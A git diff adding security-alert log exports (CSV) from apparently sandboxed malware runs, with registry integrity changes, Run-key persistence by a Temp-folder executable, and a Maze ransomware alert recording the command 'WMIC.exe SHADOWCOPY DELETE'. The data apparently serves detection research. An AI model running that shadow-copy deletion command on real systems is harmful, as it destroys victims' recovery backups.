@@ -0,0 +1,104 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 18:10:22.596",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 18:10:22.578",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 18:08:20.358",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : '1ae3d45e84e2dee7bf279de1d9e7f413' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : '76a0027224f9d4db6c051bd06678d613cdb05856' +", +"May 22, 2020 @ 18:07:09.728",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. 
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 18:06:14.882",15,"ATT&CK T1204: Maze Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:22.077 +ProcessGuid: {df9fc3d3-d15a-5ec7-0000-0010e7fc1800} +ProcessId: 6932 +Image: C:\Windows\SysWOW64\wbem\WMIC.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: WMI Commandline Utility +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: wmic.exe +CommandLine: ""C:\Windows\System32\wbem\WMIC.exe"" SHADOWCOPY DELETE +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300} +LogonId: 0x301DF +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84 +ParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700} +ParentProcessId: 7132 +ParentImage: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe +ParentCommandLine: ""C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe"" ""runas""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:22.099292900Z"",""eventRecordID"":""958"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:22.077\r\nProcessGuid: {df9fc3d3-d15a-5ec7-0000-0010e7fc1800}\r\nProcessId: 6932\r\nImage: 
C:\\Windows\\SysWOW64\\wbem\\WMIC.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: \""C:\\Windows\\System32\\wbem\\WMIC.exe\"" SHADOWCOPY DELETE\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300}\r\nLogonId: 0x301DF\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84\r\nParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700}\r\nParentProcessId: 7132\r\nParentImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\r\nParentCommandLine: \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\"" \""runas\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:22.077"",""processGuid"":""{df9fc3d3-d15a-5ec7-0000-0010e7fc1800}"",""processId"":""6932"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WMIC.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""WMI Commandline Utility"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""wmic.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe\\\"" SHADOWCOPY DELETE"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-0020df010300}"",""logonId"":""0x301df"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84"",""parentProcessGuid"":""{df9fc3d3-d152-5ec7-0000-0010dcc91700}"",""parentProcessId"":""7132"",""parentImage"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe\\\"" \\\""runas\\\""""}}}","\""C:\\Windows\\System32\\wbem\\WMIC.exe\"" SHADOWCOPY DELETE" +"May 22, 2020 @ 18:06:14.295",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:19:19.887 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700} +ProcessId: 7132 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\76F2C2FB-2630A877 +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:19.894655700Z"",""eventRecordID"":""955"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:19:19.887\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700}\r\nProcessId: 7132\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\76F2C2FB-2630A877\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:19:19.887"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-0010dcc91700}"",""processId"":""7132"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\76F2C2FB-2630A877"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe""}}}", +"May 22, 2020 @ 18:06:02.162",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:19:09.038 +ProcessGuid: {df9fc3d3-d147-5ec7-0000-00100b611500} +ProcessId: 3980 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\76F2C2FB-2630A877 +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:09.046721100Z"",""eventRecordID"":""940"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:19:09.038\r\nProcessGuid: {df9fc3d3-d147-5ec7-0000-00100b611500}\r\nProcessId: 3980\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\76F2C2FB-2630A877\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:19:09.038"",""processGuid"":""{df9fc3d3-d147-5ec7-0000-00100b611500}"",""processId"":""3980"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\76F2C2FB-2630A877"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe""}}}", +"May 22, 2020 @ 18:05:52.647",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 18:05:52.584",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 18:05:43.475",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '32d67903586d935a6926ee021a657f19'
+New md5sum is : '496e80acc19637c8daf8c286b6ea10f0'
+Old sha1sum was: '1ad1aa9999e1eafd661aa0303b51307310f5088f'
+New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9'
+",
+"May 22, 2020 @ 18:05:43.460",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '8999bd4a5ea0eeed0dd920d7e30ffee2'
+New md5sum is : '89598d32459256342f73e9b832b618dc'
+Old sha1sum was: 'a08f01e683a5864c95f899a000531cacef39c721'
+New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643'
+",
diff --git a/data/MW_16_NIDS.csv b/data/MW_16_NIDS.csv
new file mode 100644
index 0000000..03c3de0
--- /dev/null
+++ b/data/MW_16_NIDS.csv
@@ -0,0 +1 @@
+"@timestamp",message,"log.file.path"
diff --git a/data/MW_17_HIDS_1.csv b/data/MW_17_HIDS_1.csv
new file mode 100644
index 0000000..8304c83
--- /dev/null
+++ b/data/MW_17_HIDS_1.csv
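Review bot: `MW_16_NIDS.csv` contains only the header row `"@timestamp",message,"log.file.path"`, so a reader cannot tell whether sample 16 produced no network alerts or the NIDS export step failed. An explicit "no alerts captured" marker — a README entry or a sentinel record, since CSV has no comment syntax — would make the zero result deliberate rather than implicit. It would also help to state which sensor log `log.file.path` would have pointed at, so an empty result can be re-checked against the raw capture.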
@@ -0,0 +1,238 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 17:02:24.202",9,"Windows Application error event", +"Apr 4, 2020 @ 17:06:17.681",9,"Windows Application error event", +"Apr 4, 2020 @ 17:03:47.969",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '946393bfe882a9af45fb233c75a64496' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : 'e87fd396748831209129d52a5ac2ebc0c821c9d8' +" +"Apr 4, 2020 @ 17:04:48.897",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 4, 2020 @ 17:04:48.943",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '159e8160718d62e0183fb83f9d974bce' +New md5sum is : '90c308d6ba777694468a55ad137e03d6' +Old sha1sum was: '3c5d2bc914ef5d1c99fc4a118a7d0f5ee41dccb1' +New sha1sum is : '47f7098f09867fd73bd98d11049335e571a48671' +" +"Apr 4, 2020 @ 17:04:49.999",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. 
+Old md5sum was: '2d51a39060048326323e1170645b4e61' +New md5sum is : 'c75822ec611acbcbb269b78583607046' +Old sha1sum was: 'cc587367c23587922b1775a491012b83ee3fa30e' +New sha1sum is : '06e1b1660dbc4a0487198e2d7ea54076bc096408' +" +"Apr 4, 2020 @ 17:05:03.470",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 4, 2020 @ 17:05:03.503",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : 'f6e88f38b160d22d89350b94cb5237e7' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '37515d7889fae105d340a0ec0d16094dd8174d5b' +" +"Apr 4, 2020 @ 17:07:04.828",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 4, 2020 @ 17:08:51.327",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 4, 2020 @ 17:09:28.576",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. 
+Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '2c49cf8caed016631a24bd71e3e9e80c' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '40f0de11aa2ee63049f0069b6e9fa76b0dc4b8b7' +" +"Apr 4, 2020 @ 17:09:28.624",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '946393bfe882a9af45fb233c75a64496' +New md5sum is : '41a95f1abf697d2d101c1c56ccb36347' +Old sha1sum was: 'e87fd396748831209129d52a5ac2ebc0c821c9d8' +New sha1sum is : 'f9477f92a32da990982e1810a58007342e65d0dd' +" +"Apr 4, 2020 @ 17:09:28.654",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '08bb215e21ea2723bc26eeae658301e9' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : 'e76cceac6aa9a9a5411294872c62009b4702f12e' +" +"Apr 4, 2020 @ 17:09:33.701",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '47fd90673e4149c8c1bbb085f5763125' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '0d17eb3a2aeb55b8fd5633d8cbab3240e0899dbb' +" +"Apr 4, 2020 @ 17:09:36.375",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '98ec8052b0f64098916782bd320b3e94' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '56a7eb561d718adade5e96b03b3eb4989b7c6011' +" +"Apr 4, 2020 @ 17:09:42.310",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '173797c10aa556531982a7bfc8d3ab55' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'c268280af8a808346c2f86c661fabc20081c143f' +" +"Apr 4, 2020 @ 17:09:50.436",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 17:09:51.545",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '58430ce9153e479a3355075ec077b970' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'c0d3efa5f497dd52fd36e4dc2992013d18131ad3' +" +"Apr 4, 2020 @ 17:09:52.248",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '6c149849ed190eb47ba853655e554659' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'bd5b8d2f517c52a6faad39b6fdf34f1c23754d17' +" +"Apr 4, 2020 @ 17:09:54.810",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. 
+Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '58430ce9153e479a3355075ec077b970' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'c0d3efa5f497dd52fd36e4dc2992013d18131ad3' +" +"Apr 4, 2020 @ 17:09:56.217",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '1f8b87e40befb4b91987c8969454b10b' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'fe046c62a0c41e693d21fd0cd11c2f3e4edd8d1b' +" +"Apr 4, 2020 @ 17:10:01.108",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'd05d6647ae49bb2cbfc124d9f72cec8f' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : 'e179895d565ef23917dd2d5304a57defb5c2a327' +" +"Apr 4, 2020 @ 17:10:02.563",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'ebdfe878b08bab0d922ec0c0f7b8ec81' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : 'edd2f7a68434d2b48a1a28e38658484e8f04688c' +" +"Apr 4, 2020 @ 17:10:02.811",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 4, 2020 @ 17:10:04.092",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '58430ce9153e479a3355075ec077b970' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'c0d3efa5f497dd52fd36e4dc2992013d18131ad3' +" +"Apr 4, 2020 @ 17:07:01.679",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 17:07:01.741",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 17:07:49.217",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 17:07:51.032",5,"Windows audit failure event", +"Apr 4, 2020 @ 17:08:00.574",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 17:09:24.341",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:24.359",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:28.951",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:28.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:29.779",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:29.795",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 17:09:29.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 17:09:29.826",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\2' was added. 
+" +"Apr 4, 2020 @ 17:09:29.857",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 17:09:29.874",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 17:09:29.904",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:31.998",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:32.014",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:32.108",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:32.124",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:32.295",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:32.326",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:33.858",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:33.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.045",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2aaa9\Security' was added. 
